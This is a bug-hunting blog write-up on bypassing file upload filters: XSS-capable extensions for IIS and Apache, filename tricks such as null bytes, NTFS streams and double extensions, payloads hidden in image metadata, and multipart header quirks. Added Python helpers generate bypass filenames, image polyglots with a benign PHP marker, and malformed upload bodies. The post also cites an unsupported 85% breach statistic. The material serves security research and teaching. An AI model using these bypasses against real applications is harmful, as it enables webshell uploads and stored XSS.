
The Hunt for File Upload Vulnerabilities

Hello everyone,

I am Nitin Yadav (KD), back again with another write-up.


The hunt for file upload has begun.



I have heard rumors that it may have been locked up inside some dark and quiet corner of one of the many caverns under the Internet. It's probably got a secret route and tons of keys that don't let others in.


Hunting for file upload vulnerabilities in a large application is time-consuming and error-prone. I've faced this problem countless times while working on file upload functionality.





File upload vulnerabilities have gained a lot of attention lately, given the number of high-profile breaches caused by them.

Why?


In today's world, companies are storing more and more user-uploaded data that can be accessed by an attacker from anywhere in the world.


In fact, over 85% of all data breaches involved some kind of improper handling of files.


So let's dive into how you, as a security researcher, can find them.

Tips to find the vulnerability


Tip 1:

XSS: upload a file whose extension the web server maps to an HTML or XML content type. When the stored file is later requested, the browser renders it in the application's origin and any script inside it runs (stored XSS). To confirm, fetch the uploaded file and check that the response Content-Type is an HTML or XML type and that there is no Content-Disposition: attachment header. For IIS you can use these extensions:



HTML:

htm

hxt


XML:

dtd

vml

xsf

mno

wsdl

xslt

disco

exe.config

dll.config


For Apache HTTPd you can use:


HTML:

html.de

html.XXX (any unknown trailing extension; Apache evaluates every dot-separated extension of a name and ignores the ones it does not recognise, so the file is still served as HTML)


XML:

rdf

mathml


Commonly you can use:


HTML:

htm

html

shtml


XML:

xml

xsl

svg

svgz

xht

xhtml

xsd


Tip 2:


Filter bypass

  • Double extensions like .jpg.php or .php.jpg (which extension wins depends on whether the server takes the first, the last, or evaluates all of them)

  • Windows trailing dots like cyberhacks.php......... (Windows strips trailing dots and spaces when the file is created)

  • Switched case like .pHp or .PhP (a case-sensitive blacklist misses them; a case-insensitive handler still runs them)

  • Slash suffixes like cyberhacks.php/ or cyberhacks.php.\

  • Windows NTFS ADS like cyberhacks.aspx:.jpg (NTFS treats the part after the colon as an alternate data stream, so the file is created as cyberhacks.aspx)

  • Empty extension or filename like cyberhacks. or .php

  • Null bytes, spaces and new lines like cyberhacks .php, cyberhacks.png%00.php, cyberhacks.php%00.php or cyberhacks.png%0d%0a.php (the filter sees the safe extension, a C-string API stops at the null byte)

  • Magic bytes at the beginning of the file, like GIF89a, so a content sniffer accepts it as an image

  • Allowed MIME type + disallowed extension

  • Disallowed MIME type + allowed extension

  • Remove the Content-Type header from the file part entirely
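The filename tricks in this list as a generator you can drop into a proxy or a script, added here as an example (it is not code from the write-up); `cyberhacks`, `php` and `png` are just the base name and extensions used in the bullets above, and the `%00` / `%0d%0a` notation is decoded to raw bytes before sending.

```python
"""Added example for Tip 2: generate the filename variants an extension
blacklist is commonly fuzzed with. Not code from the write-up; the base
name and extensions are the ones used in the tips above."""
from __future__ import annotations
from urllib.parse import unquote_to_bytes

def filename_variants(base: str = "cyberhacks", bad: str = "php",
                      good: str = "png") -> dict[str, list[str]]:
    """Filename tricks from Tip 2, keyed by the parsing quirk they target.

    The %00 / %0d%0a forms are written URL-encoded because that is how they
    are typed into a proxy; decode_for_wire() turns them into the raw bytes
    that actually go into the multipart filename parameter.
    """
    mixed = "".join(c.upper() if i % 2 else c for i, c in enumerate(bad))  # pHp
    return {
        # Which extension the server honours depends on whether it takes the
        # first, the last, or all of them (Apache).
        "double": [f"{base}.{good}.{bad}", f"{base}.{bad}.{good}"],
        # Windows strips trailing dots and spaces when creating the file.
        "trailing_dots": [f"{base}.{bad}" + "." * 8, f"{base}.{bad} "],
        # A case-sensitive blacklist for '.php' misses these.
        "case": [f"{base}.{mixed}", f"{base}.{mixed.swapcase()}", f"{base}.{bad.upper()}"],
        # '/' or '.\' may be dropped by the filesystem layer.
        "slash_suffix": [f"{base}.{bad}/", f"{base}.{bad}.\\"],
        # NTFS alternate data stream: the file is created as cyberhacks.aspx.
        "ntfs_ads": [f"{base}.aspx:.jpg"],
        # Empty extension / empty name.
        "empty": [f"{base}.", f".{bad}"],
        # The filter sees the safe extension; a C-string API stops at \0,
        # and a CRLF may end the header line early.
        "null_and_newline": [
            f"{base}.{good}%00.{bad}", f"{base}.{bad}%00.{good}",
            f"{base}.{good}%0d%0a.{bad}", f"{base} .{bad}",
        ],
    }

def decode_for_wire(name: str) -> bytes:
    """Turn the %00 / %0d%0a notation into the raw bytes for the request."""
    return unquote_to_bytes(name)

def all_variants(**kw) -> list[str]:
    """Flat list of every variant, in a stable order."""
    return [n for group in filename_variants(**kw).values() for n in group]

if __name__ == "__main__":
    for group, names in filename_variants().items():
        print(group, names)
    print(decode_for_wire("cyberhacks.png%00.php"))
```

Send each name through the upload form, then request the file back under every plausible stored name (the original, the truncated one, the one with the stream or suffix stripped); the stored name, not the submitted one, is what tells you which quirk the server has.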

Tip 3:


Hide the shell or XSS payload in image metadata (for example an EXIF comment or a PNG text chunk). Image viewers ignore that data, so the file still opens as a normal picture while the payload survives in the stored bytes.


Tip 4:


Hide the shell or XSS payload in the image binary data itself, right after the header or appended to the end. A check that only reads the magic bytes still sees an image, but an interpreter that is made to execute the file finds the payload.
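Tips 3 and 4 together, as an added example that is not code from the write-up: one function builds a valid 1x1 PNG whose `tEXt` chunk carries the payload (metadata), another prefixes the payload with a `GIF89a` header (binary data), and a chunk parser with CRC checks proves the PNG is still well formed. The payload is a harmless constructed marker, not a working shell.

```python
"""Added example for Tips 3 and 4: put a payload in PNG metadata (a tEXt
chunk) and in the raw bytes of a GIF, keeping the magic bytes that a naive
image check looks at. Example code, not from the write-up; the payload
string is a harmless constructed marker."""
from __future__ import annotations
import struct
import zlib

PAYLOAD = '<?php echo "upload-test"; ?>'   # constructed, benign marker

PNG_SIG = b"\x89PNG\r\n\x1a\n"

def _chunk(ctype: bytes, body: bytes) -> bytes:
    """One PNG chunk: 4-byte length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)

def png_with_text_comment(payload: str) -> bytes:
    """A valid 1x1 RGB PNG whose tEXt 'Comment' chunk carries the payload.

    Viewers ignore tEXt, so the file renders as a single red pixel while
    the payload survives in the stored bytes (Tip 3: metadata).
    """
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # 1x1, 8-bit RGB
    raw = b"\x00" + b"\xff\x00\x00"                       # filter 0 + red pixel
    text = b"Comment\x00" + payload.encode("latin-1")
    return (PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(raw))
            + _chunk(b"tEXt", text) + _chunk(b"IEND", b""))

def gif_polyglot(payload: str) -> bytes:
    """GIF89a magic followed by the payload as the 'image' body (Tip 4).

    A check that only reads the first bytes accepts it as image/gif; an
    interpreter that executes the file still reaches the payload.
    """
    return b"GIF89a" + payload.encode("latin-1")

def png_chunks(data: bytes) -> list[tuple[str, bytes]]:
    """Parse chunks back out, verifying each CRC, to prove the PNG is well formed."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    pos, out = 8, []
    while pos < len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        ctype = data[pos + 4:pos + 8]
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC in chunk {ctype!r}")
        out.append((ctype.decode("ascii"), body))
        pos += 12 + length
    return out

def magic_says_image(data: bytes) -> str | None:
    """The kind of magic-byte check many upload filters stop at."""
    if data.startswith(PNG_SIG):
        return "image/png"
    if data[:6] in (b"GIF87a", b"GIF89a"):
        return "image/gif"
    if data.startswith(b"\xff\xd8\xff"):
        return "image/jpeg"
    return None

if __name__ == "__main__":
    png = png_with_text_comment(PAYLOAD)
    print([name for name, _ in png_chunks(png)], magic_says_image(png))
    print(magic_says_image(gif_polyglot(PAYLOAD)))
```

Write the bytes to a file, upload it, and download it again: if the `tEXt` chunk or the trailing bytes are still there, the application stores what it receives and does not re-encode images, which is the precondition for both tips.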




Tip 5:


Line Termination Trick: send the multipart headers with bare LF (or mixed CR and LF) line endings instead of CRLF. A filter that only splits on CRLF may not find the filename at all, while the framework's parser still reads it and stores the file.


Tip 6:


Content-Disposition Overflow: pad the Content-Disposition header with a very long junk parameter before filename=. A check that reads only a fixed number of header bytes never reaches the extension, while the real parser reads the whole line.



Tip 7:


Filename Overflow: use a filename longer than the 255-byte limit most filesystems enforce, built so that the safe extension is the part that gets truncated and the dangerous one survives (for example 251 characters, then .php, then .jpg).



Tip 8:


Duplicate Line: send two Content-Disposition lines (or two filename parameters) in the same part, one with a safe name and one with the dangerous name. The filter may honour the first while the code that stores the file honours the last, or the other way round.
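The three Content-Type bullets of Tip 2 and Tips 5 to 8 all come down to controlling the multipart body byte for byte, so here is one hand-rolled builder that covers all of them, added as an example (not code from the write-up). The boundary, the field name `file` and the naive `filename_seen_by` parser, which stands in for the strict filter on one side and the lenient framework parser on the other, are constructed for illustration.

```python
"""Added example for the Content-Type bullets of Tip 2 and for Tips 5-8:
build the multipart/form-data body by hand so each parsing quirk can be
sent exactly, and show the differential with a naive parser. Example code,
not from the write-up; the boundary, field name and parser are constructed."""
from __future__ import annotations
import re

BOUNDARY = b"----kdUploadBoundary"   # constructed; any unique string works

def multipart_upload(filename: str, content: bytes,
                     content_type: str | None = "image/png",
                     line_end: bytes = b"\r\n",
                     disposition_padding: int = 0,
                     duplicate_filename: str | None = None,
                     field: str = "file") -> bytes:
    """Body of one multipart/form-data POST carrying `content` as `filename`.

    content_type=None        omit the Content-Type header        (Tip 2)
    line_end=b"\\n"           bare LF instead of CRLF              (Tip 5)
    disposition_padding=N    N junk bytes before filename=        (Tip 6)
    duplicate_filename=...   second Content-Disposition line      (Tip 8)
    """
    pad = ('x="' + "A" * disposition_padding + '"; ') if disposition_padding else ""
    disp = f'form-data; name="{field}"; {pad}filename="{filename}"'
    head = [b"--" + BOUNDARY, b"Content-Disposition: " + disp.encode("latin-1")]
    if duplicate_filename is not None:
        dup = f'form-data; name="{field}"; filename="{duplicate_filename}"'
        head.append(b"Content-Disposition: " + dup.encode("latin-1"))
    if content_type is not None:
        head.append(b"Content-Type: " + content_type.encode("ascii"))
    return (line_end.join(head) + line_end + line_end + content + line_end
            + b"--" + BOUNDARY + b"--" + line_end)

def filename_overflow(bad_ext: str = "php", good_ext: str = "jpg",
                      limit: int = 255) -> str:
    """Tip 7: ends in the safe extension before truncation and in the
    dangerous one after it (most filesystems cap a name at 255 bytes)."""
    stem = "A" * (limit - len(bad_ext) - 1)
    return f"{stem}.{bad_ext}.{good_ext}"

def filename_seen_by(body: bytes, strict_crlf: bool = True,
                     first_wins: bool = True,
                     max_header: int | None = None) -> str | None:
    """Deliberately naive parser standing in for the two sides of the
    differential: a strict filter (CRLF only, first filename, limited header
    read) or a lenient framework (bare LF accepted, last filename wins)."""
    if strict_crlf:
        if b"\r\n\r\n" not in body:
            return None                       # no CRLF blank line: sees no headers
        head = body.split(b"\r\n\r\n", 1)[0]
        lines = head[:max_header].split(b"\r\n") if max_header else head.split(b"\r\n")
    else:
        head = re.split(rb"\r?\n\r?\n", body, maxsplit=1)[0]
        lines = re.split(rb"\r?\n", head[:max_header] if max_header else head)
    names = []
    for line in lines:
        if line.lower().startswith(b"content-disposition"):
            m = re.search(rb'filename="([^"]*)"', line)
            if m:
                names.append(m.group(1).decode("latin-1"))
    if not names:
        return None
    return names[0] if first_wins else names[-1]

if __name__ == "__main__":
    body = multipart_upload("safe.png", b"<?php ?>", duplicate_filename="shell.php")
    print(filename_seen_by(body), filename_seen_by(body, first_wins=False))
    print(filename_seen_by(multipart_upload("shell.php", b"x", line_end=b"\n")))
```

Send the body with `Content-Type: multipart/form-data; boundary=----kdUploadBoundary` and the exact `Content-Length`; if you go through a proxy, make sure it does not normalise line endings or strip the duplicate header, or the trick never reaches the server.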




Conclusion

It turns out that, even though most applications validate uploads in some way, attackers can find multiple ways around the checks, because the filter and the code that actually stores or serves the file rarely parse the request the same way.


If you want to avoid publicly available exploits and prevent your site from being compromised, you must go beyond what a vulnerability scanner can do. I discovered several vulnerabilities relating to file upload which a scanner would not be able to find.


In closing, I hope that the tips I've listed above will not only help you in security research but also raise awareness about the need to take file upload vulnerabilities seriously.


If you learn something new from this blog please leave a comment below.

I hope you enjoyed this one and I see you next time :)



Take care and stay safe!



